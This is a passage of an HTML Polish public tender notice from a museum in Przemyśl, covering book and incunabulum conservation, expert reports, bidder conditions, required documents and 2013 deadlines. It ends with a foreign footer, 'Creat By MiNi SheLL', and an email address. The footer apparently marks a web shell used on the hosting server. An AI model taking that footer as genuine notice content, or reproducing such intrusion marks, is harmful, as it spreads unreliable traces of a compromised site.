8. Doszycie wyprutych składek i scyzur pergaminowych, naprawa szycia przy plątniku, naprawa górnego zwięzu górnej okładziny. Oklejenie grzbietu paskami bibuły długowłóknistej i doklejenie pasków od wewnętrznej strony desek okładzin w celu mocnego powiązania okładzin z blokiem. 
9. Konserwacja desek okładzin: oczyszczanie mechaniczne, uzupełnianie kitami ubytków po owadach. 
10. Konserwacja oprawy skórzanej bez demontażu z desek; oczyszczenie mechaniczne i chemiczne, buforowanie, natłuszczenie i uzupełnienie ubytków, uzupełnienie grzbietu nową skórą, rekonstrukcja pasków zapięcia na dolnej okładzinie i mosiężnych uchwytów zapinek. 
11. Uzupełnienie przedniej wyklejki nowym papierem czerpanym 
12. Wykonanie pudła ochronnego do przechowywania inkunabułu. 

ZADANIE NR 5
Przedmiotem zamówienia jest:
Sporządzenie i przekazanie Zamawiającemu dwóch ekspertyz konserwatorskich dotyczących wykonania zadania nr 1; jednej (pierwszej) dokonanej w trakcie prac tj: po przedłożeniu Uszczegółowionego Programu Prac Konserwatorskich przez Wykonawcę zadania nr 1, drugiej sporządzonej po zakończeniu prac i zgłoszeniu ich do odbioru (zawierającej ocenę wykonanych prac).

ZADANIE NR 6
Przedmiotem zamówienia jest:
Sporządzenie i przekazanie Zamawiającemu dwóch ekspertyz konserwatorskich dotyczących wykonania zadania nr 2; jednej (pierwszej) dokonanej w trakcie prac tj: po przedłożeniu Uszczegółowionego Programu Prac Konserwatorskich przez Wykonawcę zadania nr 2, drugiej sporządzonej po zakończeniu prac i zgłoszeniu ich do odbioru (zawierającej ocenę wykonanych prac).

ZADANIE NR 7
Przedmiotem zamówienia jest:
Sporządzenie i przekazanie Zamawiającemu dwóch ekspertyz konserwatorskich dotyczących wykonania zadania nr 3; jednej (pierwszej) dokonanej w trakcie prac tj: po przedłożeniu Uszczegółowionego Programu Prac Konserwatorskich przez Wykonawcę zadania nr 3, drugiej sporządzonej po zakończeniu prac i zgłoszeniu ich do odbioru (zawierającej ocenę wykonanych prac)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 92.52.21.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wypełniony załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wypełniony załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wypełniony załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania osobami zdolnymi do wykonania zamówienia,  które w okresie 8 lat przed dniem wszczęcia postępowania zrealizowały co najmniej 5 zamówień obejmujących przedmiot zamówienia o podobnym rodzaju, wartości (historycznej, artystycznej i materialnej) i charakterze uszkodzeń. Pod uwagę będą brane oferty Wykonawców, którzy są i/lub dysponują osobami spełniającymi warunki określone 
w Rozporządzeniu Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym  do rejestru zabytków oraz badań archeologicznych ( Dz. U. Nr 165 poz. 987  § 22 i §  31). Dotyczy zadania nr 1, 2, 3, 4.
Dysponowania osobami zdolnymi do wykonania zamówienia,  które w okresie 10 lat przed dniem wszczęcia postępowania wykonały co najmniej 20 ekspertyz obejmujących przedmiot zamówienia a w przypadku konserwacji mebli zabytkowych wykonali 10 ekspertyz o podobnym rodzaju, wartości (historycznej, artystycznej i materialnej) i charakterze uszkodzeń. Pod uwagę będą brane oferty Wykonawców, którzy są i/lub dysponują osobami spełniającymi warunki określone w Rozporządzeniu Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym  do rejestru zabytków oraz badań archeologicznych ( Dz. U. Nr 165 poz. 987  § 22 i §  31). Dotyczy zadania nr 5, 6, 7</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca  na etapie składania oferty złoży oświadczenie, że jeżeli jego oferta zostanie wybrana jako najkorzystniejsza - będzie ubezpieczony od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej i opłaci polisę, na czas realizacji zamówienia na kwotę ubezpieczenia odpowiadającej wartości przyjętego do konserwacji obiektu lub obiektów  (dotyczy zadania 1, 2, 3, 4 ).
Wypełniony załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wszystkie załączniki do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://muzeum.przemysl.pl/mnzp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum  Narodowe  Ziemi  Przemyskiej
Pl. płk Berka Joselewicza 1, 37 - 700  Przemyśl
e-mail : mnzp@autograf.pl 
Godziny urzędowania : 7.30 - 15.30 .
Administracja.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2013 godzina 12:00, miejsce: Muzeum  Narodowe  Ziemi  Przemyskiej
Pl. płk Berka Joselewicza 1, 37 - 700  Przemyśl
e-mail : mnzp@autograf.pl 
Godziny urzędowania : 7.30 - 15.30 
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com